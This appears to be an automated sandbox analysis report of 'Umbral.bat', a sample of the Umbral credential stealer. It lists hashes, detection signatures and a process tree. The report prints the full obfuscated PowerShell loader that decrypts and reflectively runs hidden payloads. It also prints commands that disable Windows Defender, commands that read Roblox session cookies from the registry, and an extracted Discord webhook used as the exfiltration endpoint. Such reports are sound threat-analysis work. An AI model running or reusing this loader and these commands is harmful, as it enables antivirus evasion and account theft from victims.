Resubmissions
11-01-2025 02:53
250111-ddkf7ssrap 10Analysis
-
max time kernel
33s -
max time network
35s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
11-01-2025 02:53
Static task
static1
Behavioral task
behavioral1
Sample
Umbral.bat
Resource
win10ltsc2021-20241211-en
General
-
Target
Umbral.bat
-
Size
387KB
-
MD5
1e183c2ada7d55a0ccf510721415d5bc
-
SHA1
fdf973e881b0999cfde6e1a4404e0a14fba53aab
-
SHA256
5c857070215559b9e49212029a3ae61eb292347f527ba4b2f8f602eaae003654
-
SHA512
4b1a3f2e91b01468c219650e8c685bc197cb0fe2907c71db073b4a59d2cfdc91ed7975c1af01de5aed89fa59dd2b17785777e57653b896a4a39f73a65d37ec49
-
SSDEEP
6144:8idBBBsj84TcfmJNvqNuxdoyw6HWT1uPnCFIv8uOpjMWYYubRJjp03rrHA/APAxL:8idBBV8HolsnC6EUjEOAIdwum+
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1315812787699585118/w2lqDrVQqtFwk0uhRh-_CNIYMagyoPfqPEpCtbHgfK7cFpwIVOyIa3juwBy7vnR8Bh0g
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2028-18-0x000002C4F52C0000-0x000002C4F5300000-memory.dmp family_umbral -
Umbral family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 14 2028 powershell.exe 18 2028 powershell.exe 22 2028 powershell.exe 24 2028 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2240 powershell.exe 832 powershell.exe 1248 powershell.exe 440 powershell.exe 2028 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3912 InjectorForRyker.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Program crash 1 IoCs
pid pid_target Process procid_target 4924 3912 WerFault.exe 85 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InjectorForRyker.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 728 cmd.exe 2488 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3784 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2488 PING.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 2028 powershell.exe 2028 powershell.exe 3404 wmic.exe 3404 wmic.exe 3404 wmic.exe 3404 wmic.exe 3404 wmic.exe 2028 powershell.exe 2240 powershell.exe 2240 powershell.exe 832 powershell.exe 832 powershell.exe 1248 powershell.exe 1248 powershell.exe 4432 powershell.exe 4432 powershell.exe 640 wmic.exe 640 wmic.exe 640 wmic.exe 640 wmic.exe 3904 wmic.exe 3904 wmic.exe 3904 wmic.exe 3904 wmic.exe 1936 wmic.exe 1936 wmic.exe 1936 wmic.exe 1936 wmic.exe 440 powershell.exe 440 powershell.exe 3784 wmic.exe 3784 wmic.exe 3784 wmic.exe 3784 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2028 powershell.exe Token: SeIncreaseQuotaPrivilege 3404 wmic.exe Token: SeSecurityPrivilege 3404 wmic.exe Token: SeTakeOwnershipPrivilege 3404 wmic.exe Token: SeLoadDriverPrivilege 3404 wmic.exe Token: SeSystemProfilePrivilege 3404 wmic.exe Token: SeSystemtimePrivilege 3404 wmic.exe Token: SeProfSingleProcessPrivilege 3404 wmic.exe Token: SeIncBasePriorityPrivilege 3404 wmic.exe Token: SeCreatePagefilePrivilege 3404 wmic.exe Token: SeBackupPrivilege 3404 wmic.exe Token: SeRestorePrivilege 3404 wmic.exe Token: SeShutdownPrivilege 3404 wmic.exe Token: SeDebugPrivilege 3404 wmic.exe Token: SeSystemEnvironmentPrivilege 3404 wmic.exe Token: SeRemoteShutdownPrivilege 3404 wmic.exe Token: SeUndockPrivilege 3404 wmic.exe Token: SeManageVolumePrivilege 3404 wmic.exe Token: 33 3404 wmic.exe Token: 34 3404 wmic.exe Token: 35 3404 wmic.exe Token: 36 3404 wmic.exe Token: SeIncreaseQuotaPrivilege 3404 wmic.exe Token: SeSecurityPrivilege 3404 wmic.exe Token: SeTakeOwnershipPrivilege 3404 wmic.exe Token: SeLoadDriverPrivilege 3404 wmic.exe Token: SeSystemProfilePrivilege 3404 wmic.exe Token: SeSystemtimePrivilege 3404 wmic.exe Token: SeProfSingleProcessPrivilege 3404 wmic.exe Token: SeIncBasePriorityPrivilege 3404 wmic.exe Token: SeCreatePagefilePrivilege 3404 wmic.exe Token: SeBackupPrivilege 3404 wmic.exe Token: SeRestorePrivilege 3404 wmic.exe Token: SeShutdownPrivilege 3404 wmic.exe Token: SeDebugPrivilege 3404 wmic.exe Token: SeSystemEnvironmentPrivilege 3404 wmic.exe Token: SeRemoteShutdownPrivilege 3404 wmic.exe Token: SeUndockPrivilege 3404 wmic.exe Token: SeManageVolumePrivilege 3404 wmic.exe Token: 33 3404 wmic.exe Token: 34 3404 wmic.exe Token: 35 3404 wmic.exe Token: 36 3404 wmic.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeIncreaseQuotaPrivilege 2240 powershell.exe Token: SeSecurityPrivilege 2240 powershell.exe Token: SeTakeOwnershipPrivilege 2240 powershell.exe Token: SeLoadDriverPrivilege 2240 powershell.exe Token: SeSystemProfilePrivilege 2240 powershell.exe Token: SeSystemtimePrivilege 2240 powershell.exe Token: SeProfSingleProcessPrivilege 2240 powershell.exe Token: SeIncBasePriorityPrivilege 2240 powershell.exe Token: SeCreatePagefilePrivilege 2240 powershell.exe Token: SeBackupPrivilege 2240 powershell.exe Token: SeRestorePrivilege 2240 powershell.exe Token: SeShutdownPrivilege 2240 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeSystemEnvironmentPrivilege 2240 powershell.exe Token: SeRemoteShutdownPrivilege 2240 powershell.exe Token: SeUndockPrivilege 2240 powershell.exe Token: SeManageVolumePrivilege 2240 powershell.exe Token: 33 2240 powershell.exe Token: 34 2240 powershell.exe Token: 35 2240 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 3080 wrote to memory of 2028 3080 cmd.exe 83 PID 3080 wrote to memory of 2028 3080 cmd.exe 83 PID 2028 wrote to memory of 3912 2028 powershell.exe 85 PID 2028 wrote to memory of 3912 2028 powershell.exe 85 PID 2028 wrote to memory of 3912 2028 powershell.exe 85 PID 2028 wrote to memory of 3404 2028 powershell.exe 86 PID 2028 wrote to memory of 3404 2028 powershell.exe 86 PID 2028 wrote to memory of 5016 2028 powershell.exe 90 PID 2028 wrote to memory of 5016 2028 powershell.exe 90 PID 2028 wrote to memory of 2240 2028 powershell.exe 93 PID 2028 wrote to memory of 2240 2028 powershell.exe 93 PID 2028 wrote to memory of 832 2028 powershell.exe 98 PID 2028 wrote to memory of 832 2028 powershell.exe 98 PID 2028 wrote to memory of 1248 2028 powershell.exe 100 PID 2028 wrote to memory of 1248 2028 powershell.exe 100 PID 2028 wrote to memory of 4432 2028 powershell.exe 102 PID 2028 wrote to memory of 4432 2028 powershell.exe 102 PID 2028 wrote to memory of 640 2028 powershell.exe 105 PID 2028 wrote to memory of 640 2028 powershell.exe 105 PID 2028 wrote to memory of 3904 2028 powershell.exe 107 PID 2028 wrote to memory of 3904 2028 powershell.exe 107 PID 2028 wrote to memory of 1936 2028 powershell.exe 109 PID 2028 wrote to memory of 1936 2028 powershell.exe 109 PID 2028 wrote to memory of 440 2028 powershell.exe 111 PID 2028 wrote to memory of 440 2028 powershell.exe 111 PID 2028 wrote to memory of 3784 2028 powershell.exe 113 PID 2028 wrote to memory of 3784 2028 powershell.exe 113 PID 2028 wrote to memory of 728 2028 powershell.exe 116 PID 2028 wrote to memory of 728 2028 powershell.exe 116 PID 728 wrote to memory of 2488 728 cmd.exe 118 PID 728 wrote to memory of 2488 728 cmd.exe 118 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5016 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Umbral.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wTci3adIPYtqwNqviR+bzxwYoPNzIDvidB9TXeKW2VA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1LNpTwGSYS6FnEm0MyrT1w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcNMZ=New-Object System.IO.MemoryStream(,$param_var); $ARybZ=New-Object System.IO.MemoryStream; $YWZqC=New-Object System.IO.Compression.GZipStream($rcNMZ, [IO.Compression.CompressionMode]::Decompress); $YWZqC.CopyTo($ARybZ); $YWZqC.Dispose(); $rcNMZ.Dispose(); $ARybZ.Dispose(); $ARybZ.ToArray();}function execute_function($param_var,$param2_var){ $Sixjx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SbGkr=$Sixjx.EntryPoint; $SbGkr.Invoke($null, $param2_var);}$VIhio = 'C:\Users\Admin\AppData\Local\Temp\Umbral.bat';$host.UI.RawUI.WindowTitle = $VIhio;$ndlLw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VIhio).Split([Environment]::NewLine);foreach ($QIyrO in $ndlLw) { if ($QIyrO.StartsWith(':: ')) { $uHQeh=$QIyrO.Substring(3); break; }}$payloads_var=[string[]]$uHQeh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe"C:\Users\Admin\AppData\Local\Temp\InjectorForRyker.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 10524⤵
- Program crash
PID:4924
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s ""3⤵
- Views/modifies file attributes
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4432
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious behavior: EnumeratesProcesses
PID:640
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:440
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3784
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2488
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3912 -ip 39121⤵PID:2128
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD52c68559cbe31332bc34ce21502f2993e
SHA196ce58298b6800a9f09bff28a8a416a50bd10ea9
SHA25697f724ebb263f95405fd736f5c36df8be3febe91be7fe9f2d7463da8a4bbbcee
SHA51216b2e159892b61e3069d0a7f251da0effc763fc03c21843200365aa1776f0f4b91a919f27dc8bec49236636a5147b113b9adbb1c6ff990168874b60eb2bd6d73
-
Filesize
3KB
MD50f60f5267323284d7c7ed9cb3649c8bc
SHA167baafc48f2efe263605d87dd9a7da774bb5f7d0
SHA256f845430f8d0b507b393f6e45ad7be9b840a812f4c19dae814f2c453db6f3c697
SHA5126e5d3bed166a940d15dae768dfe2da07a9674f2438ebb0934b6d86059a594135850936bae1067e61deb0e37f13e7bceb1338f99e39d0bb727ce20a589f0b1cf8
-
Filesize
1KB
MD56a807b1c91ac66f33f88a787d64904c1
SHA183c554c7de04a8115c9005709e5cd01fca82c5d3
SHA256155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256
SHA51229f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200
-
Filesize
948B
MD5a9ab4419e3986b8e240c9478cc52eb51
SHA17e1b1b31bc47b9d4dccea76e6511d3632cb0395e
SHA25687c993fd034df762cdf24506c046959e98985d38697b234f7ca092db49671846
SHA5128f3d3ac39795b11719f40d3eb9a574576c8a5e6b837a1f3d63f7996faaf728e02ec5e26f4bed71ab850c9fa9272ec94fb6449b251eadc82672f84bdd5ec256a6
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
47KB
MD579462e4c8dbe2f3d18bee712144c093a
SHA1e971c1632c6f3cecb02f7145c56243af2ba3dbcb
SHA256bd7b50f7eb1081db03d83779a4f4bcf348947d808a16494aae259422b184f749
SHA512596d1c44a7c7e4070eff2f525bb93eac760b1512245805c38b98b1ae9a1646c64d9ee2a06223369221f0c1d31b9de8cda1ce79bba13d4fd6080c4138981c2a8f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82